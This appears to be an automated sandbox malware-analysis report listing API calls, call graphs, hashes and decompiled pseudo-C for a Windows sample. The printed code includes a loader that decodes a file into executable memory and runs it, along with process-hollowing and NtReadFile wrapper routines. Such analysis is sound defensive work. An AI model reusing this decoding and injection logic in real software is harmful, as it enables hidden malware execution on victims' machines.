                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,004226E8,00000000,?,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,?,0040663C,80000002), ref: 0040641B
                                  • RegCloseKey.ADVAPI32(?,?,0040663C,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,004226E8), ref: 00406426
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj, xrefs: 004063DC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CloseQueryValue
                                  • String ID: C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                  • API String ID: 3356406503-60066589
                                  • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                  • Instruction ID: c9f3435c3b1d2fe912d053175b0111224322d1506dc3db2c62222be5ebead77b
                                  • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                  • Instruction Fuzzy Hash: D2017172500209ABDF21CF51CC06EDB3BB9EB55354F014039FD1592150D738D964DB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00403B21() {
                                  				void* _t2;
                                  				void* _t3;
                                  				void* _t6;
                                  				void* _t8;
                                  
                                  				_t8 =  *0x4216cc;
                                  				_t3 = E00403B06(_t2, 0);
                                  				if(_t8 != 0) {
                                  					do {
                                  						_t6 = _t8;
                                  						_t8 =  *_t8;
                                  						FreeLibrary( *(_t6 + 8));
                                  						_t3 = GlobalFree(_t6);
                                  					} while (_t8 != 0);
                                  				}
                                  				 *0x4216cc =  *0x4216cc & 0x00000000;
                                  				return _t3;
                                  			}








                                  APIs
                                  • FreeLibrary.KERNEL32(?,7620FAA0,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                                  • GlobalFree.KERNEL32 ref: 00403B42
                                  Strings
                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Free$GlobalLibrary
                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                  • API String ID: 1100898210-3916508600
                                  • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                  • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                                  • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                                  • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00405F5C(void* __ecx, CHAR* _a4, CHAR* _a8) {
                                  				int _v8;
                                  				int _t12;
                                  				int _t14;
                                  				int _t15;
                                  				CHAR* _t17;
                                  				CHAR* _t27;
                                  
                                  				_t12 = lstrlenA(_a8);
                                  				_t27 = _a4;
                                  				_v8 = _t12;
                                  				while(lstrlenA(_t27) >= _v8) {
                                  					_t14 = _v8;
                                  					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
                                  					_t15 = lstrcmpiA(_t27, _a8);
                                  					_t27[_v8] =  *(_t14 + _t27);
                                  					if(_t15 == 0) {
                                  						_t17 = _t27;
                                  					} else {
                                  						_t27 = CharNextA(_t27);
                                  						continue;
                                  					}
                                  					L5:
                                  					return _t17;
                                  				}
                                  				_t17 = 0;
                                  				goto L5;
                                  			}










                                  APIs
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                                  • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F84
                                  • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                                  • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: lstrlen$CharNextlstrcmpi
                                  • String ID:
                                  • API String ID: 190613189-0
                                  • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                  • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                                  • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                  • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:51.7%
                                  Dynamic/Decrypted Code Coverage:96.8%
                                  Signature Coverage:23.4%
                                  Total number of Nodes:94
                                  Total number of Limit Nodes:8
                                  execution_graph 385 9c1000 GetCommandLineW CommandLineToArgvW CreateFileW 386 9c1040 GetFileSize VirtualAlloc ReadFile 385->386 387 9c1078 385->387 386->387 387->387 388 27207dd 400 27206c7 GetPEB 388->400 390 2720842 391 272099a CreateFileW 390->391 392 27209c1 391->392 393 27209bf 391->393 392->393 394 27209d4 VirtualAlloc 392->394 394->393 395 27209ee ReadFile 394->395 395->393 396 2720a06 FindCloseChangeNotification 395->396 397 2720a17 396->397 401 2720d88 397->401 400->390 415 27206c7 GetPEB 401->415 403 2720ddf 404 2720eca 403->404 406 2720ed7 403->406 414 2720a22 ExitProcess 403->414 416 27210b0 404->416 406->414 437 2720267 406->437 408 2720fdd 409 272104a 408->409 410 2720267 11 API calls 408->410 408->414 411 2720267 11 API calls 409->411 410->408 412 2721069 411->412 412->414 446 27201b6 412->446 415->403 455 27206c7 GetPEB 416->455 418 27210be 419 27211ec CreateProcessW 418->419 436 27211c7 418->436 420 2721203 GetThreadContext 419->420 419->436 421 2721226 ReadProcessMemory 420->421 420->436 422 272124a 421->422 421->436 423 272127d VirtualAllocEx 422->423 456 2720368 422->456 424 27212a7 423->424 423->436 426 2720267 11 API calls 424->426 428 27212bd 426->428 427 2721271 427->423 427->436 429 2721317 428->429 430 2720267 11 API calls 428->430 428->436 431 2720267 11 API calls 429->431 430->428 432 2721331 431->432 433 272133a SetThreadContext 432->433 432->436 434 272135f 433->434 433->436 435 27201b6 11 API calls 434->435 435->436 436->414 438 2720282 437->438 439 2720706 GetPEB 438->439 440 27202a3 439->440 441 2720335 440->441 442 27202ab 440->442 490 2720180 441->490 444 2720402 10 API calls 442->444 445 272031c 444->445 445->408 447 27201d1 446->447 448 2720706 GetPEB 447->448 449 27201f2 448->449 450 27201f6 449->450 451 272023c 449->451 453 2720402 10 API calls 450->453 493 2720192 451->493 454 2720231 453->454 454->414 455->418 457 272037b 456->457 465 2720706 GetPEB 457->465 459 272039c 460 27203a0 459->460 
461 27203e6 459->461 467 2720402 GetPEB 460->467 481 27201a4 461->481 464 27203db 464->427 466 2720729 465->466 466->459 468 2720467 467->468 484 2720744 GetPEB 468->484 471 27204ec 472 27204fd VirtualAlloc 471->472 477 27205c2 471->477 473 2720513 ReadFile 472->473 472->477 474 2720528 VirtualAlloc 473->474 473->477 474->477 478 2720549 474->478 475 2720600 VirtualFree 476 272060b 475->476 476->464 477->475 477->476 478->477 479 27205b1 FindCloseChangeNotification 478->479 480 27205b5 VirtualFree 478->480 479->480 480->477 482 2720402 10 API calls 481->482 483 27201ae 482->483 483->464 485 2720757 484->485 487 27204db CreateFileW 485->487 488 2720616 GetPEB 485->488 487->471 487->477 489 2720641 488->489 489->485 491 2720402 10 API calls 490->491 492 272018a 491->492 492->445 494 2720402 10 API calls 493->494 495 272019c 494->495 495->454

                                  Callgraph

                                  callgraph 0 Function_027210B0 1 Function_02720776 0->1 2 Function_027201B6 0->2 7 Function_02720267 0->7 9 Function_02720368 0->9 23 Function_027206C7 0->23 6 Function_027206A2 1->6 12 Function_02720192 2->12 19 Function_02720402 2->19 22 Function_02720706 2->22 25 Function_02720005 2->25 3 Function_02720A3A 4 Function_027203FD 5 Function_0272013D 7->19 21 Function_02720180 7->21 7->22 7->25 8 Function_027201A4 8->4 8->19 9->8 9->19 9->22 9->25 10 Function_009C1000 11 Function_0272012C 12->4 12->19 13 Function_02720110 17 Function_0272011F 13->17 14 Function_02720616 14->1 15 Function_027200D4 16 Function_027206DB 18 Function_027207DD 18->1 18->23 26 Function_02720D88 18->26 19->1 19->16 24 Function_02720744 19->24 20 Function_02720002 20->5 20->15 21->4 21->19 22->1 24->14 25->5 25->15 26->0 26->1 26->2 26->7 26->23

                                  Control-flow Graph

                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 027204DC
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 02720506
                                  • ReadFile.KERNELBASE(00000000,00000000,02720248,?,00000000), ref: 0272051D
                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0272053F
                                  • FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,0272019C,7FDFFF66), ref: 027205B2
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 027205BD
                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0272019C), ref: 02720608
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                  • String ID:
                                  • API String ID: 656311269-0
                                  • Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                  • Instruction ID: f421f27db85c526b787e5dd216fde338ca4917792890e697746de33de49ea2ed
                                  • Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
                                  • Instruction Fuzzy Hash: 59618F31E00225ABCF11DFA5C888BAEB7BAAF58750F148059E505EB390EB349E05CF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 027211F4
                                  • GetThreadContext.KERNELBASE(?,00010007), ref: 02721217
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: ContextCreateProcessThread
                                  • String ID: D
                                  • API String ID: 2843130473-2746444292
                                  • Opcode ID: 4e2022385cdea4111b9ac4083cea4c801fe6bd40164ecd4b511d94ae00eb2acb
                                  • Instruction ID: 30e4b49b3b6f7fa31fafd308b61d066721c10e1abdaa7679e4f7b3d5303e8594
                                  • Opcode Fuzzy Hash: 4e2022385cdea4111b9ac4083cea4c801fe6bd40164ecd4b511d94ae00eb2acb
                                  • Instruction Fuzzy Hash: 79A1B371E00129EFDF41DFA4C984BAEBBB6BF08344F504469E519EB261D731AA45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 112 9c1000-9c103a GetCommandLineW CommandLineToArgvW CreateFileW 113 9c1116-9c111c 112->113 114 9c1040-9c1072 GetFileSize VirtualAlloc ReadFile 112->114 114->113 115 9c1078-9c107a 114->115 116 9c1080 115->116 117 9c1111 115->117 118 9c1082-9c110b 116->118 117->113 118->117 118->118
                                  C-Code - Quality: 100%
                                  			_entry_() {
                                  				int _v16;
                                  				struct _OVERLAPPED* _v20;
                                  				long _v28;
                                  				void* _t48;
                                  				long _t49;
                                  				void* _t50;
                                  				void* _t51;
                                  				long _t77;
                                  				void** _t78;
                                  
                                  				_v20 = 0;
                                  				_t48 = CreateFileW((CommandLineToArgvW(GetCommandLineW(),  &_v16))[1], 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                  				if(_t48 != 0xffffffff) {
                                  					_t49 = GetFileSize(_t48, 0);
                                  					_t77 = _t49;
                                  					_t50 = VirtualAlloc(0, _t49, 0x3000, 0x40); // executed
                                  					 *_t78 = _t50;
                                  					_t4 = _t77 - 1; // -1
                                  					_t48 = ReadFile(_t48, _t50, _t4,  &_v28, 0); // executed
                                  					if(_t48 != 0) {
                                  						if(_t77 == 0) {
                                  							L5:
                                  							_t48 =  *_t78;
                                  							goto __eax;
                                  						}
                                  						_t51 = 0;
                                  						do {
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb2;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x69;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xee;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xb5;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x50;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa2;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x000000b8;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x88;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xa1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x13;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xcc;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) - 1;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0x40;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) + 0xd8;
                                  							 *( *_t78 + _t51) =  *( *_t78 + _t51) ^ 0x00000006;
                                  							_t51 = _t51 + 1;
                                  						} while (_t77 != _t51);
                                  						goto L5;
                                  					}
                                  				}
                                  				return _t48;
                                  			}













                                  APIs
                                  • GetCommandLineW.KERNEL32 ref: 009C100C
                                  • CommandLineToArgvW.SHELL32(00000000,?), ref: 009C1018
                                  • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 009C1031
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 009C1044
                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 009C1055
                                  • ReadFile.KERNELBASE(00000000,00000000,-00000001,?,00000000), ref: 009C106A
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.255847842.00000000009C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 009C0000, based on PE: true
                                  • Associated: 00000002.00000002.255842628.00000000009C0000.00000002.00000001.01000000.00000004.sdmp
                                  • Associated: 00000002.00000002.255864838.00000000009C2000.00000002.00000001.01000000.00000004.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_9c0000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: File$CommandLine$AllocArgvCreateReadSizeVirtual
                                  • String ID:
                                  • API String ID: 4005432831-0
                                  • Opcode ID: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction ID: f9d0860f3cc0db14978248b594a98d6a2eba75d40f9ec466966746852efbc90d
                                  • Opcode Fuzzy Hash: e2e8c65b62e20bc440d5b6d00bad9f5e5b00ee7004caba8489a4a99600fe35d7
                                  • Instruction Fuzzy Hash: 6A31453060C2819FD326EB24CCA4E39BBA9EF97714F15468CE1D25B6D2C7665C03D722
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 027209B3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID:
                                  • API String ID: 823142352-0
                                  • Opcode ID: 8d088e97d6171234cc6b2f606b12580658963d4f4dc01f51948f3c4c2c5ed85d
                                  • Instruction ID: 828a1cc69b76e1584563beaaae05615691f8c957e4192f3181395cd9b8fc8d2e
                                  • Opcode Fuzzy Hash: 8d088e97d6171234cc6b2f606b12580658963d4f4dc01f51948f3c4c2c5ed85d
                                  • Instruction Fuzzy Hash: 4E714835E50348EADF60DBE4E855BEEB7B5AF48710F20441AE608FA2A0E7700A45DF15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 2720616-272064f GetPEB call 2720776 299 2720651-2720654 294->299 300 2720656-272065e 294->300 301 272069b-27206a1 299->301 303 2720660-2720662 300->303 304 2720699 300->304 305 2720669-2720677 303->305 304->301 306 2720679 305->306 307 272067c-2720683 305->307 306->307 308 2720685 307->308 309 2720688-272068b 307->309 308->309 309->299 310 272068d-2720697 309->310 310->304 310->305
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                  • Instruction ID: c976b76bca5363a07e6e3b76b27dda154bae45f9d185d3526580a5162b2ce1ad
                                  • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                                  • Instruction Fuzzy Hash: 9011C271A00129AFDB209BAAC8889AEF7FEEF95694B5440A9F805D3314E774DE44C670
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                  • Instruction ID: 1aa3441db157a641251c5010ccaff08704ee3846abfc524306b408dd7746fd7a
                                  • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                                  • Instruction Fuzzy Hash: 9EE01A3576465A9FCB54CBA8C985D65B3F8EB29360B144294F819C73A0EB34EE04DAA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                  • Instruction ID: 933d62f6c42a2edd7b31421d5fded05a711e9bef559c4b19dced2c09e9c0547e
                                  • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                                  • Instruction Fuzzy Hash: 05E0863A3105218BC721DA19D584952F3E9FBA82B07154469EC4AD3711C330FC04CE60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000002.00000002.256478523.0000000002720000.00000040.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_2_2_2720000_sfxwkrzgst.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                  • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                                  • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                                  • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:4.2%
                                  Dynamic/Decrypted Code Coverage:2.7%
                                  Signature Coverage:5.8%
                                  Total number of Nodes:584
                                  Total number of Limit Nodes:70

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 0 41868a-41868c 1 4186d7-4186d9 0->1 2 41868f-4186d5 call 4191e0 NtReadFile 0->2 2->1
                                  C-Code - Quality: 37%
                                  			E0041868A(void* __eflags, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                  				signed int _v117;
                                  				void* _t15;
                                  				void* _t29;
                                  				void* _t30;
                                  				intOrPtr* _t32;
                                  				void* _t33;
                                  
                                  				_t33 = ss;
                                  				if(__eflags == 0) {
                                  					_v117 =  !_v117;
                                  					_t16 = _a4;
                                  					_t32 = _a4 + 0xc48;
                                  					E004191E0(_t29, _t16, _t32,  *((intOrPtr*)(_t16 + 0x10)), 0, 0x2a);
                                  					_t6 =  &_a40; // 0x413a31
                                  					_t8 =  &_a32; // 0x413d72
                                  					_t14 =  &_a8; // 0x413d72
                                  					_t15 =  *((intOrPtr*)( *_t32))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36,  *_t6, _t30, _t33); // executed
                                  				}
                                  				return _t15;
                                  			}










                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:A$r=A$r=A
                                  • API String ID: 2738559852-4243674446
                                  • Opcode ID: cdd0b196793e50f8b9f4954bfa91e4a05865ec030249a5c23353f1b5074c7126
                                  • Instruction ID: 3a026407efb5c7c3908f0cdb4655059b8a7fc547382bdd7f066258e72157c2b5
                                  • Opcode Fuzzy Hash: cdd0b196793e50f8b9f4954bfa91e4a05865ec030249a5c23353f1b5074c7126
                                  • Instruction Fuzzy Hash: 39F0F4B6200108AFCB14DF99DC85EEB77A9EF8C354F118249FE0DA7241CA34E951CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5 418690-4186a6 6 4186ac-4186d9 NtReadFile 5->6 7 4186a7 call 4191e0 5->7 7->6
                                  C-Code - Quality: 37%
                                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
                                  				void* _t18;
                                  				void* _t27;
                                  				intOrPtr* _t28;
                                  
                                  				_t13 = _a4;
                                  				_t28 = _a4 + 0xc48;
                                  				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                  				_t4 =  &_a40; // 0x413a31
                                  				_t6 =  &_a32; // 0x413d72
                                  				_t12 =  &_a8; // 0x413d72
                                  				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
                                  				return _t18;
                                  			}







                                  APIs
                                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:A$r=A$r=A
                                  • API String ID: 2738559852-4243674446
                                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                  • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 262 41883a-41883c 263 4187d8-4187fd NtAllocateVirtualMemory 262->263 264 41883e-418856 262->264 265 41885c-418875 call 12e96e0 264->265 266 418857 call 4191e0 264->266 266->265
                                  C-Code - Quality: 44%
                                  			E0041883A(void* __eflags, intOrPtr _a4, intOrPtr* _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
                                  				intOrPtr _v0;
                                  				intOrPtr* _v4;
                                  				intOrPtr* __esi;
                                  				void* __ebp;
                                  				void* _t14;
                                  				long _t18;
                                  
                                  				asm("repne in al, dx");
                                  				if(__eflags > 0) {
                                  					 *((intOrPtr*)(_t14 + 0xa)) =  *((intOrPtr*)(_t14 + 0xa)) + _t15;
                                  					_t18 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
                                  					return _t18;
                                  				} else {
                                  					__ebp = __esp;
                                  					__eax = _v4;
                                  					_t9 = __eax + 0xc68; // 0x10c68
                                  					__esi = _t9;
                                  					__eax = E004191E0(__edi, _v4, __esi,  *((intOrPtr*)(__eax + 0x10)), 0, 0x32);
                                  					__edx = _a12;
                                  					__eax = _a8;
                                  					__edx = _v0;
                                  					__eax =  *__esi;
                                  					__eax =  *__eax(_a4, _a8, _a12, __esi, __ebp, 0x55, __ebp); // executed
                                  					__esi = __edx;
                                  					_pop(__ebp);
                                  					return __eax;
                                  				}
                                  			}










                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_sfxwkrzgst.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: a35d85eea9d5bdaf3945f2f61cafa922d56539f5a5088f80fbdc4dfd71912d77
                                  • Instruction ID: fbd88c388806d2352f766dd33cd0f10e0573a0ab3f55dc952fac234f78f8edd3
                                  • Opcode Fuzzy Hash: a35d85eea9d5bdaf3945f2f61cafa922d56539f5a5088f80fbdc4dfd71912d77
                                  • Instruction Fuzzy Hash: 0C0116B6200209AFDB14DF88DC81DEB77A9EF88754F118659FA1897241D631ED51CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
